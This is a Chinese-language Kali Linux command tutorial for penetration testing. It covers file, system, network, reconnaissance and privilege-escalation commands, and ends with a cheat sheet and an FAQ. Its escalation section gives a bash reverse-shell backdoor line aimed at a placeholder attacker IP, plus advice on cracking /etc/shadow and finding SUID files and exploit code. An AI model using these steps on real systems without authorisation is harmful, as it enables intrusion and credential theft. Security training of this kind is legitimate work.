Kali Linux作为渗透测试和安全研究的专用操作系统,其强大的功能离不开命令行的支持,掌握基础命令是高效使用Kali的前提,以下从文件操作、系统管理、网络工具、信息收集和权限提升五个维度展开详细说明。

文件与目录操作命令
文件管理是Linux操作的核心,Kali中常用的命令包括ls、cd、cp、mv和rm。ls -la可显示详细文件列表,包括隐藏文件(以开头);cd ..返回上级目录,cd ~进入用户主目录;cp -r用于递归复制整个目录;mv既可重命名文件也可移动文件位置;rm -rf需谨慎使用,强制递归删除文件及目录,文本编辑方面,nano适合新手,vim则需掌握基本模式切换(命令模式i进入编辑,Esc退出编辑,wq保存退出),权限修改通过chmod实现,如chmod 755 file设置所有者可读写执行,组用户和其他用户可读执行;chown用于更改文件所有者,例如chown user:group file。
系统管理与监控命令
系统信息查看是基础操作,uname -a显示内核及系统详细信息,top和htop提供实时进程监控(后者支持交互式操作),df -h以人类可读格式显示磁盘使用情况,软件管理依赖apt系列命令,apt update更新软件源列表,apt upgrade升级已安装软件,apt install package_name安装指定软件包,apt autoremove清理无用依赖,进程管理中,ps aux查看所有进程,kill -9 PID强制终止进程,systemctl start/stop service_name控制服务状态,网络配置方面,ifconfig或ip addr查看网络接口信息,ping测试网络连通性,ss -tulnp监听端口状态。
网络诊断与分析命令
网络工具是Kali的亮点,nmap是端口扫描利器,基础用法如nmap -sS -O target_ip进行SYN扫描和操作系统检测;netcat(nc)被誉为“网络工具中的瑞士军刀”,nc -lvp 1234监听本地端口,nc target_ip 80连接目标服务,抓包分析使用tcpdump,例如tcpdump -i eth0 -w capture.pcap抓取指定接口数据包并保存,路由追踪通过traceroute或mtr实现,后者可提供持续的路由监控。curl和wget用于文件传输,curl -I url仅获取HTTP头部信息,wget -r递归下载整个网站。
信息收集与枚举命令
渗透测试初期需收集目标信息,whois查询域名注册信息,dig或nslookup进行DNS解析,theHarvester可批量收集邮箱、子域名等资产(如theHarvester -d example.com -b google),针对本地系统,sudo -l查看当前用户的sudo权限,env显示环境变量,history查看命令历史记录,网络扫描中,dirb和gobuster用于目录爆破,dirb http://target.com -w wordlist.txt指定字典扫描敏感路径,服务识别方面,whatweb可分析网站技术栈,nikto -h url扫描Web服务器漏洞。

权限提升与维持命令
权限提升是渗透测试关键步骤,Linux内核漏洞利用可通过searchsploit查找利用代码(如searchsploit Linux Kernel 3.2),然后编译执行,SUID提权需关注find / -perm -u=s -type f 2>/dev/null查找具有SUID权限的文件,维持访问时,crontab -l查看定时任务,/etc/passwd和/etc/shadow可尝试破解用户密码(使用john the ripper工具),后门创建可利用netcat或python反弹shell,例如bash -i >& /dev/tcp/攻击者IP/端口 0>&1。
常用命令速查表
| 命令类别 | 命令格式示例 | 功能描述 |
|---|---|---|
| 文件操作 | ls -la |
列出所有文件及详细信息 |
cp -r dir1 dir2 |
递归复制目录 | |
| 系统管理 | top -u username |
按用户监控进程 |
apt install metasploit-framework |
安装Metasploit框架 | |
| 网络工具 | nmap -sV target_ip |
扫描端口并识别服务版本 |
tcpdump -i eth0 port 80 |
抓取HTTP流量数据包 | |
| 信息收集 | theHarvester -d example.com -b bing |
通过Bing搜索引擎收集子域名 |
nmap -p- --open target_ip |
扫描所有开放端口 | |
| 权限提升 | find / -perm -4000 -type f |
查找SUID权限文件 |
sudo -l |
查看当前用户的sudo权限 |
相关问答FAQs
Q1: 如何在Kali Linux中查看当前开放的端口及对应进程?
A1: 可使用ss -tulnp命令查看所有监听的TCP/UDP端口及关联进程,或通过netstat -tulnp实现相同功能。ss -tulnp | grep :80可筛选出80端口对应的进程信息,有助于发现异常服务或未授权开放端口。
Q2: Kali Linux中如何高效查找特定漏洞的利用代码?
A2: 利用searchsploit工具结合关键词或版本号搜索,如searchsploit "Apache 2.4.49"查找Apache特定版本漏洞,或searchsploit -m exploit_code_id直接复制利用代码到本地目录,可访问Exploit-DB官网或使用msfconsole内置的search命令(如search type:exploit target:linux)结合Metasploit框架进行漏洞利用。

